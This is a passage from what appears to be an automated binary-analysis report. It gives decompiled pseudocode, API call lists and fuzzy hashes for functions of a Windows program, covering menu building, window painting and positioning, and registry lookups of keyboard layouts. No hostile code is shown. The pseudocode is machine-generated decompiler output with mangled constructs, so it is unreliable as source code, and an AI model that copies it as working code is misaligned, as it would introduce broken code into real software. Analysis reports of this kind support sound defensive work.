					SetRect( &_v36, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
					DrawEdge(_t99,  &_v36, _v12, _t98);
					E0042A894(_t99, _v36.top, _v36.left);
					IntersectClipRect(_t99, 0, 0, _v36.right - _v36.left, _v36.bottom - _v36.top);
				}
				E0042D0C4(_t82, _t99, 0x14, 0);
				E0042D0C4(_t82, _t99, 0xf, 0);
				_t59 =  *((intOrPtr*)(_t82 + 0x19c));
				if(_t59 == 0) {
					L12:
					_t61 = RestoreDC(_t99, _v16);
					 *(_t82 + 0x54) =  *(_t82 + 0x54) & 0x0000ff7f;
					return _t61;
				} else {
					_t63 =  *((intOrPtr*)(_t59 + 8)) - 1;
					if(_t63 < 0) {
						goto L12;
					}
					_v20 = _t63 + 1;
					_v8 = 0;
					do {
						_t66 = E00413E68( *((intOrPtr*)(_t82 + 0x19c)), _v8);
						_t107 =  *((char*)(_t66 + 0x57));
						if( *((char*)(_t66 + 0x57)) != 0) {
							E00430648(_t66,  *((intOrPtr*)(_t66 + 0x40)), _t99, _t107,  *((intOrPtr*)(_t66 + 0x44)));
						}
						_v8 = _v8 + 1;
						_t36 =  &_v20;
						 *_t36 = _v20 - 1;
					} while ( *_t36 != 0);
					goto L12;
				}
			}

0x00430653
0x00430655
0x00430657
0x00430663
0x0043066d
0x0043067f
0x00430684
0x00430688
0x0043069d
0x004306b7
0x004306bc
0x004306c1
0x004306c3
0x004306ca
0x004306ca
0x0043069f
0x0043069f
0x004306a6
0x004306a6
0x004306d1
0x004306e3
0x004306f2
0x004306ff
0x00430717
0x00430717
0x00430727
0x00430737
0x0043073c
0x00430744
0x00430783
0x00430788
0x0043078d
0x00430799
0x00430746
0x00430749
0x0043074c
0x00000000
0x00000000
0x0043074f
0x00430752
0x00430759
0x00430762
0x00430767
0x0043076b
0x00430776
0x00430776
0x0043077b
0x0043077e
0x0043077e
0x0043077e
0x00000000
0x00430759

APIs

SaveDC.GDI32 ref: 0043065E

Part of subcall function 0042A894: GetWindowOrgEx.GDI32(?), ref: 0042A8A2
Part of subcall function 0042A894: SetWindowOrgEx.GDI32(?,?,?,00000000), ref: 0042A8B8

IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0043067F
GetWindowLongA.USER32(00000000,000000EC), ref: 00430695
GetWindowLongA.USER32(00000000,000000F0), ref: 004306B7
SetRect.USER32(?,00000000,00000000,?,?), ref: 004306E3
DrawEdge.USER32(?,?,?,00000000), ref: 004306F2
IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00430717
RestoreDC.GDI32(?,?), ref: 00430788

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: Window$Rect$ClipIntersectLong$DrawEdgeRestoreSave
String ID:
API String ID: 2976466617-0
Opcode ID: 30b03d3e48027a81f6de5f78405fbcd8eb6fcd175706d7947e9a2a898969c566
Instruction ID: af9657c4f0c67481b2a93df167d6872bccd163c7545bd33edea00a0cb035c3aa
Opcode Fuzzy Hash: 30b03d3e48027a81f6de5f78405fbcd8eb6fcd175706d7947e9a2a898969c566
Instruction Fuzzy Hash: 93416471B002146BDB10EB9DCC91FAE77B9AF48304F10416AF905EB396D779ED018B68

Uniqueness

Uniqueness Score: -1.00%

Function 0043B6EC, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 187
windowCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E0043B6EC(void* __eax, void* __ebx, char __ecx, struct HMENU__* __edx, void* __edi, void* __esi) {
				char _v5;
				char _v12;
				char _v13;
				struct tagMENUITEMINFOA _v61;
				char _v68;
				intOrPtr _t103;
				CHAR* _t109;
				char _t115;
				short _t149;
				void* _t154;
				intOrPtr _t161;
				intOrPtr _t184;
				struct HMENU__* _t186;
				int _t190;
				void* _t192;
				intOrPtr _t193;
				void* _t196;
				void* _t205;

				_t155 = __ecx;
				_v68 = 0;
				_v12 = 0;
				_v5 = __ecx;
				_t186 = __edx;
				_t154 = __eax;
				_push(_t196);
				_push(0x43b947);
				_push( *[fs:eax]);
				 *[fs:eax] = _t196 + 0xffffffc0;
				if( *((char*)(__eax + 0x3e)) == 0) {
					L22:
					_pop(_t161);
					 *[fs:eax] = _t161;
					_push(0x43b94e);
					E004041E0( &_v68);
					return E004041E0( &_v12);
				}
				E00404278( &_v12,  *((intOrPtr*)(__eax + 0x30)));
				if(E0043D6A8(_t154) <= 0) {
					__eflags =  *((short*)(_t154 + 0x60));
					if( *((short*)(_t154 + 0x60)) == 0) {
						L8:
						if((GetVersion() & 0x000000ff) < 4) {
							_t190 =  *(0x479b2c + ((E004045EC( *((intOrPtr*)(_t154 + 0x30)), 0x43b96c) & 0xffffff00 | __eflags == 0x00000000) & 0x0000007f) * 4) |  *0x00479B20 |  *0x00479B10 |  *0x00479B18 | 0x00000400;
							_t103 = E0043D6A8(_t154);
							__eflags = _t103;
							if(_t103 <= 0) {
								InsertMenuA(_t186, 0xffffffff, _t190,  *(_t154 + 0x50) & 0x0000ffff, E004046A0(_v12));
							} else {
								_t109 = E004046A0( *((intOrPtr*)(_t154 + 0x30)));
								InsertMenuA(_t186, 0xffffffff, _t190 | 0x00000010, E0043BBFC(_t154), _t109);
							}
							goto L22;
						}
						_v61.cbSize = 0x2c;
						_v61.fMask = 0x3f;
						_t192 = E0043DC64(_t154);
						if(_t192 == 0 ||  *((char*)(_t192 + 0x40)) == 0 && E0043D280(_t154) == 0) {
							if( *((intOrPtr*)(_t154 + 0x4c)) == 0) {
								L14:
								_t115 = 0;
								goto L16;
							}
							_t205 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x4c)))) + 0x1c))();
							if(_t205 == 0) {
								goto L15;
							}
							goto L14;
						} else {
							L15:
							_t115 = 1;
							L16:
							_v13 = _t115;
							_v61.fType =  *(0x479b60 + ((E004045EC( *((intOrPtr*)(_t154 + 0x30)), 0x43b96c) & 0xffffff00 | _t205 == 0x00000000) & 0x0000007f) * 4) |  *0x00479B58 |  *0x00479B34 |  *0x00479B68 |  *0x00479B70;
							_v61.fState =  *0x00479B40 |  *0x00479B50 |  *0x00479B48;
							_v61.wID =  *(_t154 + 0x50) & 0x0000ffff;
							_v61.hSubMenu = 0;
							_v61.hbmpChecked = 0;
							_v61.hbmpUnchecked = 0;
							_v61.dwTypeData = E004046A0(_v12);
							if(E0043D6A8(_t154) > 0) {
								_v61.hSubMenu = E0043BBFC(_t154);
							}
							InsertMenuItemA(_t186, 0xffffffff, 0xffffffff,  &_v61);
							goto L22;
						}
					}
					_t193 =  *((intOrPtr*)(_t154 + 0x64));
					__eflags = _t193;
					if(_t193 == 0) {
						L7:
						_push(_v12);
						_push(0x43b960);
						E0043AD50( *((intOrPtr*)(_t154 + 0x60)), _t154, _t155,  &_v68, _t193);
						_push(_v68);
						E00404560();
						goto L8;
					}
					__eflags =  *((intOrPtr*)(_t193 + 0x64));
					if( *((intOrPtr*)(_t193 + 0x64)) != 0) {
						goto L7;
					}
					_t184 =  *0x43a5e0; // 0x43a62c
					_t149 = E00403604( *((intOrPtr*)(_t193 + 4)), _t184);
					__eflags = _t149;
					if(_t149 != 0) {
						goto L8;
					}
					goto L7;
				}
				_v61.hSubMenu = E0043BBFC(_t154);
				goto L8;
			}

0x0043b6ec
0x0043b6f7
0x0043b6fa
0x0043b6fd
0x0043b700
0x0043b702
0x0043b706
0x0043b707
0x0043b70c
0x0043b70f
0x0043b716
0x0043b929
0x0043b92b
0x0043b92e
0x0043b931
0x0043b939
0x0043b946
0x0043b946
0x0043b722
0x0043b730
0x0043b73e
0x0043b743
0x0043b788
0x0043b796
0x0043b8e2
0x0043b8ea
0x0043b8ef
0x0043b8f1
0x0043b924
0x0043b8f3
0x0043b8f6
0x0043b90b
0x0043b90b
0x00000000
0x0043b8f1
0x0043b79c
0x0043b7a3
0x0043b7b1
0x0043b7b5
0x0043b7cc
0x0043b7da
0x0043b7da
0x00000000
0x0043b7da
0x0043b7d6
0x0043b7d8
0x00000000
0x00000000
0x00000000
0x0043b7de
0x0043b7de
0x0043b7de
0x0043b7e0
0x0043b7e0
0x0043b82f
0x0043b856
0x0043b85d
0x0043b862
0x0043b867
0x0043b86c
0x0043b877
0x0043b883
0x0043b88c
0x0043b88c
0x0043b898
0x00000000
0x0043b898
0x0043b7b5
0x0043b745
0x0043b748
0x0043b74a
0x0043b764
0x0043b764
0x0043b767
0x0043b773
0x0043b778
0x0043b783
0x00000000
0x0043b783
0x0043b74c
0x0043b750
0x00000000
0x00000000
0x0043b755
0x0043b75b
0x0043b760
0x0043b762
0x00000000
0x00000000
0x00000000
0x0043b762
0x0043b739
0x00000000

APIs

InsertMenuItemA.USER32(?,000000FF,000000FF,0000002C), ref: 0043B898
GetVersion.KERNEL32(00000000,0043B947), ref: 0043B788

Part of subcall function 0043BBFC: CreatePopupMenu.USER32 ref: 0043BC17

Strings

,, xrefs: 0043B79C
?, xrefs: 0043B7A3

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: Menu$CreateInsertItemPopupVersion
String ID: ,$?
API String ID: 133695497-2308483597
Opcode ID: 35d5c0c72b3d3e68fa32901941adcd03c4d692c9391fb1900aaab0ac51f149db
Instruction ID: 9c7d7fc3d1f1e25a757f4c1ba4dd95cb9fd786c25b86cb2137dc0125ea8c93ee
Opcode Fuzzy Hash: 35d5c0c72b3d3e68fa32901941adcd03c4d692c9391fb1900aaab0ac51f149db
Instruction Fuzzy Hash: 9861A070A102449BDB10EF6AEC8179A7BF9FF49314F04647AEA44E7396D738E841C798

Uniqueness

Uniqueness Score: -1.00%

Function 004339A0, Relevance: 10.7, APIs: 7, Instructions: 156
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E004339A0(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _v8;
				void _v12;
				intOrPtr _v16;
				int _v24;
				int _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr* _t80;
				intOrPtr _t91;
				void* _t119;
				intOrPtr _t136;
				intOrPtr _t145;
				void* _t148;

				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t119 = __ecx;
				_v8 = __eax;
				_t145 =  *0x47a0fc; // 0x47bba0
				 *((char*)(_v8 + 0x210)) = 1;
				_push(_t148);
				_push(0x433b79);
				_push( *[fs:eax]);
				 *[fs:eax] = _t148 + 0xffffffe0;
				E0042BF78(_v8, __ecx, __ecx, _t145);
				_v16 = _v16 + 4;
				E0042D168(_v8,  &_v28);
				if(E00448E94() <  *(_v8 + 0x4c) + _v24) {
					_v24 = E00448E94() -  *(_v8 + 0x4c);
				}
				if(E00448EA0() <  *(_v8 + 0x48) + _v28) {
					_v28 = E00448EA0() -  *(_v8 + 0x48);
				}
				if(E00448E88() > _v28) {
					_v28 = E00448E88();
				}
				if(E00448E7C() > _v16) {
					_v16 = E00448E7C();
				}
				SetWindowPos(E0043260C(_v8), 0xffffffff, _v28, _v24,  *(_v8 + 0x48),  *(_v8 + 0x4c), 0x10);
				if(GetTickCount() -  *((intOrPtr*)(_v8 + 0x214)) > 0xfa && E004044A0(_t119) < 0x64 &&  *0x479958 != 0) {
					SystemParametersInfoA(0x1016, 0,  &_v12, 0);
					if(_v12 != 0) {
						SystemParametersInfoA(0x1018, 0,  &_v12, 0);
						if(_v12 == 0) {
							E00436BF4( &_v36);
							if(_v32 <= _v24) {
							}
						}
						 *0x479958(E0043260C(_v8), 0x64,  *0x00479A60 | 0x00040000);
					}
				}
				_t80 =  *0x479fc4; // 0x47bb9c
				_t45 =  *_t80 + 0x30; // 0x502b4
				E0042FD40(_v8,  *_t45);
				ShowWindow(E0043260C(_v8), 4);
				 *((intOrPtr*)( *_v8 + 0x7c))();
				_pop(_t136);
				 *[fs:eax] = _t136;
				_push(0x433b80);
				 *((intOrPtr*)(_v8 + 0x214)) = GetTickCount();
				_t91 = _v8;
				 *((char*)(_t91 + 0x210)) = 0;
				return _t91;
			}

0x004339ae
0x004339af
0x004339b0
0x004339b1
0x004339b2
0x004339b4
0x004339b7
0x004339c0
0x004339c9
0x004339ca
0x004339cf
0x004339d2
0x004339da
0x004339df
0x004339e9
0x00433a00
0x00433a0f
0x00433a0f
0x00433a24
0x00433a33
0x00433a33
0x00433a40
0x00433a49
0x00433a49
0x00433a56
0x00433a5f
0x00433a5f
0x00433a85
0x00433a9d
0x00433ac5
0x00433ace
0x00433add
0x00433ae6
0x00433af4
0x00433aff
0x00433aff
0x00433aff
0x00433b23
0x00433b23
0x00433ace
0x00433b29
0x00433b30
0x00433b36
0x00433b46
0x00433b50
0x00433b55
0x00433b58
0x00433b5b
0x00433b68
0x00433b6e
0x00433b71
0x00433b78

APIs

SetWindowPos.USER32(00000000,000000FF,?,?,?,?,00000010,00000000,00433B79), ref: 00433A85
GetTickCount.KERNEL32 ref: 00433A8A
SystemParametersInfoA.USER32(00001016,00000000,?,00000000), ref: 00433AC5
SystemParametersInfoA.USER32(00001018,00000000,00000000,00000000), ref: 00433ADD
AnimateWindow.USER32(00000000,00000064,00000001), ref: 00433B23
ShowWindow.USER32(00000000,00000004,00000000,000000FF,?,?,?,?,00000010,00000000,00433B79), ref: 00433B46

Part of subcall function 00436BF4: GetCursorPos.USER32(?), ref: 00436BF8

GetTickCount.KERNEL32 ref: 00433B60

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: Window$CountInfoParametersSystemTick$AnimateCursorShow
String ID:
API String ID: 3024527889-0
Opcode ID: ac2fe94d1476f03422f3e3dbc2945de97cad5822bbb5cc2c17b8152d0c8f215a
Instruction ID: 75f1efcb647682a7d1c88c0cbcd0064643a641a5b30cdbda66ea6a33692c701a
Opcode Fuzzy Hash: ac2fe94d1476f03422f3e3dbc2945de97cad5822bbb5cc2c17b8152d0c8f215a
Instruction Fuzzy Hash: 65512F74A00105EFDB10EF99C982A9EB7F5EF09304F20456AF544E7352D779AE40DB98

Uniqueness

Uniqueness Score: -1.00%

Function 0043079C, Relevance: 10.6, APIs: 7, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0043079C(intOrPtr* __eax, void* __edx) {
				struct HDC__* _v8;
				void* _v12;
				void* _v16;
				struct tagPAINTSTRUCT _v80;
				intOrPtr _v84;
				void* _v96;
				struct HDC__* _v104;
				void* _v112;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t38;
				struct HDC__* _t47;
				struct HDC__* _t55;
				intOrPtr* _t83;
				intOrPtr _t102;
				void* _t103;
				void* _t108;
				void* _t111;
				void* _t113;
				intOrPtr _t114;

				_t111 = _t113;
				_t114 = _t113 + 0xffffff94;
				_push(_t103);
				_t108 = __edx;
				_t83 = __eax;
				if( *((char*)(__eax + 0x1f8)) == 0 ||  *((intOrPtr*)(__edx + 4)) != 0) {
					if(( *(_t83 + 0x55) & 0x00000001) != 0 || E0042F3A8(_t83) != 0) {
						_t38 = E004302C0(_t83, _t83, _t108, _t103, _t108);
					} else {
						_t38 =  *((intOrPtr*)( *_t83 - 0x10))();
					}
					return _t38;
				} else {
					L0040677C();
					 *((intOrPtr*)( *__eax + 0x44))();
					 *((intOrPtr*)( *__eax + 0x44))();
					_t47 = _v104;
					L0040647C();
					_v12 = _t47;
					L004069B4();
					L00406484();
					_v8 = _t47;
					_v16 = SelectObject(_v8, _v12);
					 *[fs:eax] = _t114;
					_t55 = BeginPaint(E0043260C(_t83),  &_v80);
					E0042D0C4(_t83, _v8, 0x14, _v8);
					 *((intOrPtr*)(_t108 + 4)) = _v8;
					E0043079C(_t83, _t108);
					 *((intOrPtr*)(_t108 + 4)) = 0;
					 *((intOrPtr*)( *_t83 + 0x44))(_v8, 0, 0, 0xcc0020,  *[fs:eax], 0x4308ee, _t111, 0, 0, __eax, __eax, _t47, _v84, 0);
					 *((intOrPtr*)( *_t83 + 0x44))(_v84);
					_push(_v104);
					_push(0);
					_push(0);
					L00406464();
					EndPaint(E0043260C(_t83),  &_v80);
					_t102 = _t55;
					 *[fs:eax] = _t102;
					_push(0x4308f5);
					SelectObject(_v8, _v16);
					DeleteDC(_v8);
					return DeleteObject(_v12);
				}
			}

0x0043079d
0x0043079f
0x004307a4
0x004307a5
0x004307a7
0x004307b0
0x004307bc
0x004307db
0x004307c9
0x004307cf
0x004307cf
0x004308fb
0x004307e5
0x004307e7
0x004307f5
0x00430803
0x00430806
0x0043080b
0x00430810
0x00430816
0x0043081d
0x00430822
0x00430832
0x00430840
0x0043084f
0x00430864
0x0043086c
0x00430873
0x0043087a
0x00430891
0x0043089f
0x004308a5
0x004308a6
0x004308a8
0x004308ab
0x004308bc
0x004308c3
0x004308c6
0x004308c9
0x004308d6
0x004308df
0x004308ed
0x004308ed

APIs

72E7AC50.USER32(00000000), ref: 004307E7
SelectObject.GDI32(00000000,?), ref: 0043082D
BeginPaint.USER32(00000000,?,00000000,004308EE,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 0043084F
EndPaint.USER32(00000000,?,00000000,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 004308BC
SelectObject.GDI32(00000000,?), ref: 004308D6
DeleteDC.GDI32(00000000), ref: 004308DF
DeleteObject.GDI32(?), ref: 004308E8

Part of subcall function 004302C0: BeginPaint.USER32(00000000,?), ref: 004302E6
Part of subcall function 004302C0: EndPaint.USER32(00000000,?,004303E7), ref: 004303DA

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: Paint$Object$BeginDeleteSelect
String ID:
API String ID: 1227948915-0
Opcode ID: aa4f6db53998714e553605f38002fe0ed6fb31f1badac5f55f88ad1b8d81d20b
Instruction ID: a73050b9ccd0d67d9d4b5c2a363ad150c17e911de69a22dbc0da87dc3872155f
Opcode Fuzzy Hash: aa4f6db53998714e553605f38002fe0ed6fb31f1badac5f55f88ad1b8d81d20b
Instruction Fuzzy Hash: D2413D75B00204AFCB00EBA9CD85F9EB7F8AF48704F10457AB509EB281DA79ED05CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004490FC, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 125
registryCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E004490FC(intOrPtr __eax, void* __ebx, void* __fp0) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				char _v20;
				intOrPtr* _v24;
				struct HKL__* _v280;
				char _v536;
				char _v600;
				char _v604;
				intOrPtr _v608;
				char _v612;
				void* _t60;
				intOrPtr _t106;
				intOrPtr _t111;
				void* _t117;
				void* _t118;
				intOrPtr _t119;
				void* _t129;

				_t129 = __fp0;
				_t117 = _t118;
				_t119 = _t118 + 0xfffffda0;
				_v612 = 0;
				_v8 = __eax;
				_push(_t117);
				_push(0x4492a7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t119;
				if( *((intOrPtr*)(_v8 + 0x34)) != 0) {
					L11:
					_pop(_t106);
					 *[fs:eax] = _t106;
					_push(0x4492ae);
					return E004041E0( &_v612);
				} else {
					 *((intOrPtr*)(_v8 + 0x34)) = E0040343C(1);
					E004041E0(_v8 + 0x38);
					_t60 = GetKeyboardLayoutList(0x40,  &_v280) - 1;
					if(_t60 < 0) {
						L10:
						 *((char*)( *((intOrPtr*)(_v8 + 0x34)) + 0x1d)) = 0;
						E004159F8( *((intOrPtr*)(_v8 + 0x34)), 1);
						goto L11;
					} else {
						_v20 = _t60 + 1;
						_v24 =  &_v280;
						do {
							if(E00437064( *_v24) == 0) {
								goto L9;
							} else {
								_v608 =  *_v24;
								_v604 = 0;
								if(RegOpenKeyExA(0x80000002, E00408CB4( &_v600, "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x", _t129, 0), 0, 0x20019,  &_v16) != 0) {
									goto L9;
								} else {
									_push(_t117);
									_push(0x449263);
									_push( *[fs:eax]);
									 *[fs:eax] = _t119;
									_v12 = 0x100;
									if(RegQueryValueExA(_v16, "layout text", 0, 0,  &_v536,  &_v12) == 0) {
										E00404450( &_v612, 0x100,  &_v536);
										 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x34)))) + 0x3c))();
										if( *_v24 ==  *((intOrPtr*)(_v8 + 0x3c))) {
											E00404450(_v8 + 0x38, 0x100,  &_v536);
										}
									}
									_pop(_t111);
									 *[fs:eax] = _t111;
									_push(0x44926a);
									return RegCloseKey(_v16);
								}
							}
							goto L12;
							L9:
							_v24 = _v24 + 4;
							_t38 =  &_v20;
							 *_t38 = _v20 - 1;
						} while ( *_t38 != 0);
						goto L10;
					}
				}
				L12:
			}

0x004490fc
0x004490fd
0x004490ff
0x00449108
0x0044910e
0x00449113
0x00449114
0x00449119
0x0044911c
0x00449126
0x00449288
0x00449290
0x00449293
0x00449296
0x004492a6
0x0044912c
0x0044913b
0x00449144
0x00449157
0x0044915a
0x00449277
0x0044927d
0x00449283
0x00000000
0x00449160
0x00449161
0x0044916a
0x0044916d
0x00449179
0x00000000
0x0044917f
0x00449191
0x00449197
0x004491c1
0x00000000
0x004491c7
0x004491c9
0x004491ca
0x004491cf
0x004491d2
0x004491d5
0x004491fb
0x0044920e
0x00449226
0x00449234
0x00449247
0x00449247
0x00449234
0x0044924e
0x00449251
0x00449254
0x00449262
0x00449262
0x004491c1
0x00000000
0x0044926a
0x0044926a
0x0044926e
0x0044926e
0x0044926e
0x00000000
0x0044916d
0x0044915a
0x00000000

APIs

GetKeyboardLayoutList.USER32(00000040,?,00000000,004492A7,?,02321310,?,00449309,00000000,?,0042E447), ref: 00449152
RegOpenKeyExA.ADVAPI32(80000002,00000000), ref: 004491BA
RegQueryValueExA.ADVAPI32(?,layout text,00000000,00000000,?,00000100,00000000,00449263,?,80000002,00000000), ref: 004491F4
RegCloseKey.ADVAPI32(?,0044926A,00000000,?,00000100,00000000,00449263,?,80000002,00000000), ref: 0044925D

Strings

layout text, xrefs: 004491EB
System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 004491A4

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: CloseKeyboardLayoutListOpenQueryValue
String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text
API String ID: 1703357764-2652665750
Opcode ID: 53df62fc097e03b1967630614d084bb945a517b524cd0af8c40f6a5ebbc6c006
Instruction ID: cabee2372ca536cbd940e8878d1d1132709e93f287dc7902c7b1d1c915a0792b
Opcode Fuzzy Hash: 53df62fc097e03b1967630614d084bb945a517b524cd0af8c40f6a5ebbc6c006
Instruction Fuzzy Hash: 3A415A74A04209AFEB10DF95C985BDEB7F8FB48304F5044E6E904A7392D778AE40DB69

Uniqueness

Uniqueness Score: -1.00%

Function 0042C9CC, Relevance: 10.6, APIs: 7, Instructions: 122
windowCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0042C9CC(void* __ebx, char __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
				char _v5;
				struct HDC__* _v12;
				struct HDC__* _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				int _v32;
				int _v36;
				struct HDC__* _t33;
				intOrPtr _t72;
				int _t74;
				intOrPtr _t80;
				int _t83;
				void* _t88;
				int _t89;
				void* _t92;
				void* _t93;
				intOrPtr _t94;

				_t92 = _t93;
				_t94 = _t93 + 0xffffffe0;
				_v5 = __ecx;
				_t74 =  *((intOrPtr*)( *__edx + 0x38))();
				if(_v5 == 0) {
					_push(__edx);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_pop(_t88);
				} else {
					_push(__edx);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_pop(_t88);
				}
				_v12 = GetDesktopWindow();
				_push(0x402);
				_push(0);
				_t33 = _v12;
				_push(_t33);
				L00406784();
				_v16 = _t33;
				_push(_t92);
				_push(0x42cae7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t94;
				_v20 = SelectObject(_v16, E0041D068( *((intOrPtr*)(_t88 + 0x40))));
				_t89 = _v36;
				_t83 = _v32;
				PatBlt(_v16, _t89 + _t74, _t83, _v28 - _t89 - _t74, _t74, 0x5a0049);
				PatBlt(_v16, _v28 - _t74, _t83 + _t74, _t74, _v24 - _t83 - _t74, 0x5a0049);
				PatBlt(_v16, _t89, _v24 - _t74, _v28 - _v36 - _t74, _t74, 0x5a0049);
				PatBlt(_v16, _t89, _t83, _t74, _v24 - _v32 - _t74, 0x5a0049);
				SelectObject(_v16, _v20);
				_pop(_t80);
				 *[fs:eax] = _t80;
				_push(0x42caee);
				_push(_v16);
				_t72 = _v12;
				_push(_t72);
				L004069B4();
				return _t72;
			}

0x0042c9cd
0x0042c9cf
0x0042c9d5
0x0042c9e1
0x0042c9e7
0x0042c9f7
0x0042c9fe
0x0042c9ff
0x0042ca00
0x0042ca01
0x0042ca02
0x0042c9e9
0x0042c9e9
0x0042c9f0
0x0042c9f1
0x0042c9f2
0x0042c9f3
0x0042c9f4
0x0042c9f4
0x0042ca08
0x0042ca0b
0x0042ca10
0x0042ca12
0x0042ca15
0x0042ca16
0x0042ca1b
0x0042ca20
0x0042ca21
0x0042ca26
0x0042ca29
0x0042ca3e
0x0042ca4a
0x0042ca52
0x0042ca5f
0x0042ca81
0x0042caa0
0x0042caba
0x0042cac7
0x0042cace
0x0042cad1
0x0042cad4
0x0042cadc
0x0042cadd
0x0042cae0
0x0042cae1
0x0042cae6

APIs

GetDesktopWindow.USER32 ref: 0042CA03
SelectObject.GDI32(?,00000000), ref: 0042CA39
PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 0042CA5F
PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 0042CA81
PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 0042CAA0
PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 0042CABA
SelectObject.GDI32(?,?), ref: 0042CAC7

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: ObjectSelect$DesktopWindow
String ID:
API String ID: 2666862715-0
Opcode ID: 44f779f9375408f30171e2ff2796f9a8d8454052103d67ccb283a684acc5c7fd
Instruction ID: a1a3ec50940cfbceeba1208980f5f61a865081e135a0f2f4acd7b0629ecf0432
Opcode Fuzzy Hash: 44f779f9375408f30171e2ff2796f9a8d8454052103d67ccb283a684acc5c7fd
Instruction Fuzzy Hash: 0931FBB6E00219BFDB00DEEDDC85EAFBBBCAF49704B414465B504F7245C679AD048BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00439B50, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 80
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E00439B50(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				void* __ecx;
				intOrPtr _t9;
				void* _t11;
				intOrPtr _t17;
				void* _t28;
				void* _t29;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t37;
				struct HINSTANCE__* _t41;
				void* _t43;
